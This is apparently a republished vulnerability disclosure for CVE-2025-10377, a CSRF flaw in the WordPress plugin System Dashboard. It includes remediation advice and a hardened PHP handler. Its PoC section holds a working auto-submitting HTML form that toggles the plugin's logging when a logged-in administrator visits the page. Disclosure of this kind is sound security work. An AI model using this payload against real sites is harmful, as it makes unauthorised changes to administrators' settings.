Related vulnerability

Title: WordPress plugin System Dashboard Cross-Site Request Forgery Vulnerability (CVE-2025-10377)

Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that lets users set up a personal blog site on a server running PHP and MySQL. A WordPress plugin is an application add-on. WordPress plugin System Dashboard 2.8.20 and earlier versions contain a cross-site request forgery vulnerability. The vulnerability stems from the sd_toggle_logs function lacking nonce verification, which may allow cross-site request forgery attacks.

Description: CVE-2025-10377

Introduction
# Proof of Concept CVE-2025-10377 Cross-Site Request Forgery (CSRF) in Plugin System Dashboard (Function sd_toggle_logs)
**Vulnerability Type:** Cross-Site Request Forgery (CSRF)
**Affected Function:** sd_toggle_logs()
**CVSS v3.1:** 4.3 (Medium)    
**Vector:** AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N    
*(Note: Score reflects unauthorized state change requiring an admin victim and user interaction.)*
**Description of Vulnerability:**
The function `sd_toggle_logs()` performs sensitive operations such as enabling or disabling Page Access Logs, Error Logs, and Email Delivery Logs. However, it relies solely on the `$_REQUEST['log_type']` parameter and a capability check (`current_user_can( 'manage_options' )`) without any CSRF protection, such as a nonce check (`check_admin_referer()` or, for admin-ajax handlers, `check_ajax_referer()`).
As a result, an attacker can lure a logged-in Administrator to visit a malicious page that silently submits a crafted request, causing unintended enable/disable changes to site logging.
## Impact:
- Unauthorized state changes for site logging features (Page Access Log, Error Log, Email Delivery Log).
- If error logging is enabled, the site may begin writing application errors to a file path determined by the plugin (increasing the chance of operational information disclosure via logs), but the direct impact of this issue is the state toggle itself.
## POC 
When a logged-in User with `manage_options` visits the attacker’s page, the respective logging feature is toggled without explicit consent.
```html
<html>
  <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd_toggle_logs" />
      <input type="hidden" name="log_type" value="errors_log" />
      <input type="hidden" name="fast_ajax" value="true" />
      <input type="hidden" name="load_plugins[]" value="system-dashboard/system-dashboard.php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
## Remediation
- Implement WordPress nonces (`check_admin_referer()` or `wp_verify_nonce()`) to validate requests.
- Restrict sensitive actions to POST requests only.
- Avoid relying solely on capability checks for protection against CSRF.
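The following is an added illustration of the remediation above, not the plugin's own code: a hardened admin-ajax handler for the `sd_toggle_logs` action that verifies a WordPress nonce, accepts POST only, keeps the capability check, and whitelists `log_type`. The hook name follows WordPress's `wp_ajax_{action}` convention; the function name, nonce action string, option names, script handle, and the log type keys other than `errors_log` are assumptions chosen here.

```php
<?php
// Added example (not System Dashboard's real code): CSRF-hardened handler for
// admin-ajax.php?action=sd_toggle_logs. WordPress routes that action to the
// wp_ajax_sd_toggle_logs hook for logged-in users.
add_action( 'wp_ajax_sd_toggle_logs', 'example_sd_toggle_logs_hardened' );

function example_sd_toggle_logs_hardened() {
    // 1. POST only: an auto-submitted GET form (as in the PoC) is rejected outright.
    if ( 'POST' !== strtoupper( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        wp_send_json_error( 'POST required', 405 );
    }

    // 2. Nonce check. check_ajax_referer() reads the '_wpnonce' field and, on
    //    failure, terminates the request (the third argument defaults to true).
    //    'sd_toggle_logs' is a hypothetical nonce action string.
    check_ajax_referer( 'sd_toggle_logs', '_wpnonce' );

    // 3. Capability check stays: necessary, but on its own it does nothing against
    //    CSRF because the victim's browser supplies the admin's cookies.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Whitelist log_type from $_POST instead of trusting $_REQUEST blindly.
    //    Only 'errors_log' appears in the report; the other keys are placeholders.
    $allowed  = array( 'page_access_log', 'errors_log', 'email_delivery_log' );
    $log_type = isset( $_POST['log_type'] ) ? sanitize_key( wp_unslash( $_POST['log_type'] ) ) : '';
    if ( ! in_array( $log_type, $allowed, true ) ) {
        wp_send_json_error( 'invalid log_type', 400 );
    }

    // Flip the stored state (hypothetical option name).
    $option  = 'example_sd_' . $log_type . '_enabled';
    $enabled = ! (bool) get_option( $option, false );
    update_option( $option, $enabled );

    wp_send_json_success( array( 'log_type' => $log_type, 'enabled' => $enabled ) );
}

// The legitimate dashboard page must hand the nonce to its own JavaScript so the
// toggle request can include '_wpnonce'. The script handle is hypothetical.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-sd-dashboard', 'exampleSd', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'sd_toggle_logs' ),
    ) );
} );
```

A cross-origin page cannot read the nonce embedded in the admin's dashboard, so the forged form in the PoC fails the `check_ajax_referer()` step before any state changes.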
## Video POC
If you're unable to reproduce the issue exactly as described in the report, please refer to the following video demonstration (PoC) for a clear reproduction scenario:
https://youtu.be/WtWYIfEM4W0

File snapshot

 [4.0K]  /data/pocs/b5b0bab670892a0d876dbd66085bb0fe9508ac87
├── [2.5K]  POC_csrf.md
└── [2.5K]  README.md
0 directories, 2 files
Notes

1. It is recommended to access the PoC through its original source first.
2. If the source has become unavailable or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.